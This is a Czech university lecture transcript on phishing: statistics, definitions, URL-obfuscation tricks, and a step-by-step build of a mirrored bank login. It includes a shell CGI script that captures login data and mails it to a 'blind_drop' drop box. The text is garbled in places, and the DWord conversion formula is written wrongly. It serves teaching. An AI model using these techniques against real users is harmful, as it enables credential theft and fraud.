Počítačové viry a bezpečnost počítačových systémů. Phishing

Podobné dokumenty
Stinnou stránkou elektronické komunikace nejsou jenom HOAXy. Josef Džubák

Vývoj Internetových Aplikací

Práce s ovými schránkami v síti Selfnet

Bezpečnostní rizika spojená s platebními službami

Cross-Site Scripting (XSS)

Návod na používání systému Bakaláři pro zákonné zástupce žáků Základní školy a mateřské školy Mosty u Jablunkova 750

Faxový server společnosti PODA s.r.o.

Jen technická ochrana nestačí. Ing. Jindřich Hlaváč, CISA DCIT, a.s.,

Aktuální hrozby internetu. 1.Trojské koně (malware) 2.Phishing 3.Sociální sítě

Příručka pro školy. Školní projekt na Portálu farmáře

Nejčastější podvody a útoky na Internetu. Pavel Bašta

Antispamové technologie

CISCO CCNA I. 8. Rizika síťového narušení

Bezpečnost internetového bankovnictví, bankomaty

Nejzajímavější bezpečnostní incidenty CSIRT.CZ. Pavel Bašta

Outlook Express

Bezpečnostní zásady. Příloha č. 1 k Podmínkám České národní banky pro používání služby ABO-K internetové bankovnictví

Gymnázium a Střední odborná škola, Rokycany, Mládežníků 1115

Návod na používání webmailu

Bezpečnostní zásady. d) Disponent je povinen při používání čipové karty nebo USB tokenu, na nichž je

Škodlivý kód, útok na aplikace. Ing. Miloslav Hub, Ph.D. 5. prosince 2007

EUROPEAN COMPUTER DRIVING LICENCE / INTERNATIONAL COMPUTER DRIVING LICENCE - IT Security SYLABUS 1.0 (M12)

Typy bezpečnostních incidentů

Příručka pro školy. Školní projekt na Portálu farmáře

Poznámky k oficiálním cvičným testům pro modul M12

Webové hrozby KDO

Příručka nastavení funkcí snímání

MƏj úĭet Uživatelský manuál Verze 1.01/2010

OCHRANA SOUKROMÍ CRON SYSTEMS, S.R.O. PRO WEBOVOU STRÁNKU 1. Obecné informace.

Adware ENISA. Aktivní kybernetická obrana. Aktivum. Analýza hrozeb. Analýza počítačového viru. Antispamový filtr. Antivirový program

Příručka rychlého nastavení snímání do u

Uživatel počítačové sítě

Už ivatelska dokumentace

Elektronická evidence tržeb v programu TRIFID

Postup nastavení bezpečné ové schránky pro zákazníky Logicentra

Uživatelská příručka. Chráníme více lidí před více online hrozbami než kdokoli jiný na světě.

REGISTRACE UŽIVATELE

Inovace výuky prostřednictvím ICT v SPŠ Zlín, CZ.1.07/1.5.00/ Vzdělávání v informačních a komunikačních technologií

1.3. HW (hardware): veškeré fyzicky existující technické vybavení počítače nebo serveru.

Analýza podvodných ových zpráv

Tematický celek: Základy hardware a sítí. Učivo (téma): Hrozby internetu škodlivé programy

2.přednáška. Informační bezpečnost: Systém řízení informační bezpečnosti (ISMS)

Internet 3 publikování na webu, zásady bezpečnosti

Hromadný / Newsletter

Antivirové programy, Firewally, AntiSpywary, AntiSpamy

Co je to sociální síť?

1. Způsoby zabezpečení internetových bankovních systémů

Počítačová bezpečnost Aktualizace OS a aplikačních programů Firewall a další bezpečnostní nástroje

Připojení ke vzdálené aplikaci Target 2100

REGISTRACE UŽIVATELE

Google Apps. pošta 1. verze 2012

Role ISDS v digitalizaci

Informační a komunikační technologie. 1.5 Malware

Hromadné licence společnosti Adobe

Použití Office 365 na iphonu nebo ipadu

Inovace bakalářského studijního oboru Aplikovaná chemie

Bezpečnost. Michal Dočekal

ZVLÁŠTNÍ PODMÍNKY SDÍLENÉHO HOSTINGU

Uživatelská dokumentace

Ing. Přemysl Brada, MSc., Ph.D. Ing. Martin Dostal. Katedra informatiky a výpočetní techniky, FAV, ZČU v Plzni

mbank.cz mtransfer Okamžitá notifikace o mtransferu Dokumentace pro externího partnera

Uživatelská příručka. Parcel. Internetová aplikace pro sběr dat o cenách za dodávání balíků. Příručka pro poskytovatele služeb dodávání balíků (PDSP)

Inovace bakalářského studijního oboru Aplikovaná chemie

Mgr. Stěpan Stěpanov, 2013

Testování webových aplikací Seznam.cz

Autorizační systém Uživatelská příručka pro Samoobslužnou aplikaci

Jednorázová hesla pro zvýšení bezpečnosti vzdáleného přístupu mobilních uživatelů

Bezpečnost a virová problematika

Phishingové útoky v roce 2014

REGISTRACE UŽIVATELE

Manuál PVU dodavatel

Elektronická evidence tržeb v programu TRIFID

Autorizační systém Uživatelská příručka pro Samoobslužnou aplikaci

PRO TRAVEL CK, s.r.o. Prokopova 23, Plzeň Tel.: Internet:

Elektronické podání žádosti o udělení výjimky pro použití konvenčních osiv v ekologickém zemědělství prostřednictvím Portálu farmáře MZe

Elektronické podání žádosti o udělení výjimky pro použití konvenčních osiv v ekologickém zemědělství prostřednictvím Portálu farmáře MZe

Bezpečnostní rizika chytrých spotřebičů a Internetu věcí

Zásady ochrany osobních údajů Garaventa Lift. Jaké osobní údaje Garaventa Lift shromažďuje?

webmarketin Základní moduly aplikace

Problematika internetové bezpečnosti a obrany proti DDoS útokům. Ing. Tomáš Havlíček Produktový manažer

Příručka Google Cloud Print

Informace o poštovním provozu na serveru mail.ktkadan.cz a stručný návod na použití OpenWebMailu

Šifrování Autentizace Bezpečnostní slabiny. Bezpečnost. Lenka Kosková Třísková, NTI TUL. 22. března 2013

Analýza a zabezpečení počítačové sítě

Registrační číslo projektu: CZ.1.07/1.5.00/ Elektronická podpora zkvalitnění výuky CZ.1.07 Vzděláním pro konkurenceschopnost

Manuál pro správu uživatelských účtů aplikace MoneyWeb

Filter online threats off your network

Po prvním spuštění Chrome Vás prohlížeč vyzve, aby jste zadali své přihlašovací údaje do účtu Google. Proč to udělat? Máte několik výhod:

Nastavení tabletu Apple ipad

Výtisk č.: Počet listů 19. Přílohy: 0 ÚZIS ČR. Role žadatel - postup

Příručka pro uživatele ČSOB InternetBanking 24 a ČSOB BusinessBanking 24 Online s čipovou kartou

VY_32_INOVACE_IKTO2_1960 PCH

Platební systém XPAY [

XTB VPS. XTB Virtual Private Server manuál

Provozní dokumentace. Seznam orgánů veřejné moci. Příručka pro běžného uživatele

Bezpečné placení na Internetu

Nastavení telefonu Nokia Asha 311

Bezpečnostní zásady. d) Disponent je povinen při používání čipové karty nebo USB tokenu, na nichž je

Jak nastavit poštu v síti SPKFree

Střední odborná škola a Střední odborné učiliště, Hořovice

Transkript:

! Počítačové viry a bezpečnost počítačových systémů Phishing prof. Ing. Ivan Zelinka, Ph.D. Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba Czech Republic! Email: ivan.zelinka@vsb.cz www.ivanzelinka.eu Phone: +420 57 603 5192 GSM: +420 775 161 965 prof. Ing. Ivan Zelinka, Ph.D. http://www.ivanzelinka.eu/hp/vyuka.html

Schéma přednášky

Schéma přednášky

Pishing V roce 2004 byly téměř 2 miliony občanů USA vystaveny útoku virtuálních zločinců Celkové ztráty dosáhly téměř 2 miliard dolarů phishingové e-mailů stoupá (např. v r. 2005 během 6. měsících o 4 000 procent Podle společnosti Symantec, poskytovatele antispamové technologie, tvořil spam 63 procenta ze 2,93 miliardy e-mailů zachycených softwarem společnosti Brightmail AntiSpam V polovině července roku 2004 zablokovaly filtry firmy Brightmail AntiSpam 9 milionů pokusů o phishing týdně. Tento počet v prosinci 2004 přesáhl 33 miliony zablokovaných zpráv týdně

Pishing průběhu 24 hodin v březnu 2005 bylo 10 z 12 e-mailů oficiálně zařazeno jako spam a každá 82. zpráva v sobě skrývala virus Pokud alespoň 1 ze 100 000 příjemců skutečně zareaguje na pobídku Klepněte sem", která se objevuje ve spamech, mají spammeři dostatečný finanční stimul k tomu, aby rozeslali dalších 5 milionů spamových zpráv Phishing představuje podskupinu kategorie spamu. Mezi hlavní identifikační rysy patří: nástroj pro hromadnou poštu a jeho vlastnosti zvyky v oblasti odesílání pošty včetně konkrétních stylů a rozvrhů, ale nejen jich druh systému používaného pro rozesílání spamu (v počítači, kde se e-maily vytvářejí) druh systému používaného pro umístění phishingového serveru v struktura nepřátelského phishingového serveru včetně využívání HTML, JS, PHP a jiných skriptů

Pishing

Spam - pishing Nevyžádaná obchodní elektronická pošta (UCE) Neodpovídající obchodní elektronická pošta (NCE) Producenti seznamů Samy Scamy tvoří největší část spamu. Jejich účelem je získání významných finančních prostředků prostřednictvím oklamání uživatelů. Mezi podskupiny scamu patří 419 (scam nigerijského typu), malware a phishing.

Pishing Podle Internet Storm Center vydrží čistá schránka pod Windows bez jakékoli záplaty na Internetu odolávat průměrně 20 minut Pishing je definován jako primitivní metoda, jako způsob odeslání falšovaného e-mailupříjemci, který klamavým způsobem napodobuje legální instituci s úmyslem vyzvědět od příjemce důvěrné informace jako číslo platební karty nebo heslo k bankovnímu účtu. Takový e-mail většinou navádí uživatele, aby navštívil nějaké webové stránky a zadal zde tyto důvěrné informace. Tyto stránky mají design podobný jako instituce, za kterou se scammer vydává, aby získal vaši důvěru. Stránky této instituci samozřejmě nepatří a výsledkem je ukradení vašich důvěrných údajů za účelem finančního zisku. Proto je slovo phishing evidentně variací na slovo fishing (rybaření), kde scammer nakazuje háčky" v naději, že se do nich pár jeho obětí zakousne".

Pishing Příklad : matení oka Jednoduchým příkladem je wuw.citibank.com@www.google.com. Webový prohlížeč přečte pravou stranu adresy a přejde na Google. Symbol @ v prohlížeči většinou indikuje uživatelské jméno a heslo, podobně jako u FTP. V případě, že se nezadá, je bezvýznamný. FTP přihlášení ve webovém prohlížeči může vypadat nějak takhle: ftp://username:pass@ftp.site.com. Aby to phisher ještě více zkomplikoval, zmate URL jeho nečitelným zakódováním. To lze provést mnoha způsoby. Nejdříve vyhledáme IP adresu pro Google, která je např. 216.239.57.104 Dále konvertujme řetězec do DWord (Double Word). Word je normální počet bitů, který je vyhovující pro provádění operací u konkrétní architektury. U architektury Intel je tímto počtem 16 bitů, takže Double Word bude 32 bitů a uvádí se v desetinné podobě. Matematicky se konverze IP adresy do DWord provede takto: (216*256+239)*(256+57)*(256+104) = 3639556456, čímž nás http://3639556456 dostane na google.com

Pishing Lze zadat www.citibank.com@36395 56456/ a jsme na google.com Dále to lze ještě více zkomplikovat, šestnáctkový kód pro @ je 40. V případě URL se pro indikaci šestnáctkového kódu použije předpona %. Pakdostaneme www.citibank.com%403639556456/

Co není phish Scam typu Nigerian 419 Tento scam, známý také jako advanced fee fraud, podvod typu vymáhání zálohového poplatku nebo také scam Ponzi, mezi nás přišel ještě před začátkem 80. let. Přichází ve formě faxu, dopisu nebo e-mailu. Podvodná internetová aukce Tyto scamy čítají až 64 % veškerých internetových podvodů a jsou hlavním druhem podvodu používaného na internetu (Internet Fraud Complaint Center, www.ifccfbi.org)

Phish statistika Na Jednu hromadnou zásilku čítající 100 000 e-mailů přijme až 10 % příjemců a vynese okolo 1 % obětí. Phishers našli využití pro každý účet, který získají: od praní špinavých peněz k odcizení, podvodům a krádežím identity. Phishers zdokonalují svoje metody v oblasti key-loggingového malwaru (zaznamenávání stisku kláves). Místo sběru dat ze všech webových stránek vyhledávají data z jednotlivých URL a využívají i faktor botnetu a vyzbrojují se sami pomocí distribuovaných serverů po celém světě. Trojské koně jako Trojan.BankAsh nakazí soubory hostitelského počítače a berou si je na nepravé bankovní weby za účelem ukradení dat jejich uživatelů. Phishers využívají zranitelnost v rámci Cross-Site Scripting2 (XSS), možnosti přesměrování URL a jakékoli způsoby vykořisťování spojené s prohlížeči, které jim umožní provádět útoky za účelem získání informací o uživatelích.

Phish statistika Běžná metoda odhadu velikosti hromadné zásilky potřebuje využít shromážděné e-mailové adresy: Vytvořte skupinu e-mailových adres, které budete využívat pouze pro potřeby spamu. Obecně se jí říká spamový účet typu honeypot (úmyslně nezabezpečený systém, který umožňuje monitorovat podezřelou aktivitu). Provedte distribuci těchto e-mailových adres do nižných míst. Tento proces se nazývá rozsévání, protože adresy z honeypotu se sází" do různých fór. Vyčkejte, dokud účty nezačnou přijímat spamy. Může to trvat hodiny i měsíce, podle daného fóra. phishing představuje 0,5 % veškerého spamu, nebo zhruba 25 milionů e-mailů každý den.

Phish statistika úspěšnosti phishingu: téměř 50 % možných obětí - lidí, kteří klepnou na odkaz v e-mailu - se objeví během prvních 24 hodin po odeslání hromadné pošty v téměř 50 % možných obětí se objeví během dalších 24 hodin po odeslání hromadné pošty méně než 1 procento možných obětí vstoupí na stránku po 48 hodinách Phishingové servery, které se uzavřou během 24 hodin, mohou omezit míru návratnosti na polovinu. Naopak phishingové servery, které se neodstaví do 48 hodin, se vystavují 50% riziku, že budou během následujícího měsíce použity pro jiný phishingový útok. Doba mezi opětovným použitím se mění podle phishingových skupin - některé skupiny používají servery okamžitě znovu, jiné čekají s návratem týdny.

Phish statistika S během první hodiny po odeslání hromadné pošty může být až 20 % přístupů na phishingový server ze strany antiphishingových organizací. V logu to lze najít podle typu prohlížeče (wget je zřejmá indikace antiphishingové organizace) a IP adresy. Především IP adresa může vést ke známé antiphishingové skupině. V téměř 80 procent antiphishingových skupin, které na server vstoupí, tak činí během prvních 12 hodin. Po 48 hodinách patří téměř všechny přístupy antiphishingovým skupinám. Jsou to pravděpodobně skupiny, které ověřují, zda je server stále aktivní.

Falešná identita - zrcadlo V tomto kroku se pomocí SW robota provede stažení vybrané webové stránky. Povšimněte si souboru robots.txt, který slouží k zamezení přístupu robotů k vybraným částem stránek. Platí pouze pro roboty splňující normu RES-Robot Exclusion Standard.

Obsah souboru robot.txt může být například: Falešná identita - zrcadlo

Falešná identita - nastavení pishingového serveru

Falešná identita - založení anonymní schránky Všimli jste si, že jediný nepropojený odkaz vede na cgi/login.cgi? Je to náš hlavní cíl, protože zpracovává důvěrné přihlašovací údaje pro celou stránku. Nemáme přístup ke kódu cílové stránky pro Login.cgi, takže si vybudujeme svůj vlastní. Tento modifikovaný soubor Login.cgi provede dvě hlavní akce: zaznamená přihlašovací údaje, odešle je do naší anonymní schránky a zároveň odešle MITM POST zpátky na stránku s uživatelskými údaji a v zásadě se přihlásí místo něj. Tato technika MITM byla užita phishery, kteří se zaměřili na PayPal, je to diskrétní způsob, jak podfouknout oběť, aniž by si byla něčeho vědoma, jelikož jsme napojeni zpět na skutečný cíl a uživatel bude přihlášen.

Falešná identita - založení anonymní schránky #!/bin/sh PATH=/bin:/usr/bin:/usr/local/bin RSERVER=bank.securescience.net/bank URI='echo "${REQUEST_URI}" sed-e 's@.*/cgi/@/cgi/@'' # Give CGI header and start web page echo "Status: 301 Moved Content- Type: text/html Location: http://${rserver}${uri} <html> <body> This page has moved to <a href=\"http://${rserver}${uri}\">http://${rserver}${request JJRI}</a> </body> </html>" Tento kód vezme URI z REQUEST_URI a odstraní vše až k /cgi/(za předpokladu, že /cgi/ je obsaženo v URÍ) a předává výsledky do URI.

Falešná identita - založení anonymní schránky pro zachycení dat použijeme e-mailovou adresu jako naši anonymní schránku, pro ukázku použijme blind_drop@securescience.net. SENDER=stolen_data@securescience.net RECIPIENT=blind_drop@securescience.net POSTDATA='echo "${URI}" sed -e ' s/\/cgi\/login.cgi?//'' cat «! /usr/lib/sendmail -t From: ${SENDER} To: ${RECIPIENT} ${POSTDATA}!

Falešná identita - příprava phishingového e-mailu

Útok přesměrováním Pro phishingovou techniku přesměrování je standardním postupem sběr dat a přesměrování oběti na skutečnou stránku. Jedná se o jeden ze sofistikovanějších způsobů phishingového útoku, jelikož neexistuje žádná sběrná webová stránka, žádné obrázky a na jediném použitém serveru běží jen přesměrovací skript. Uživatel je vyzván k zadání svých přihlašovacích informací přímo do e-mailové zprávy. Tento způsob phishingu je velmi populární na ebay, PayPal a elektronických obchodech jako např. Amazon. Od takových společností mnohem pravděpodobněji obdržíte e-mail ohledně výhod a nově nabízených služeb, takže napodobení postupu, který je pohodlnější pro zákazníky elektronických obchodů, je pochopitelné.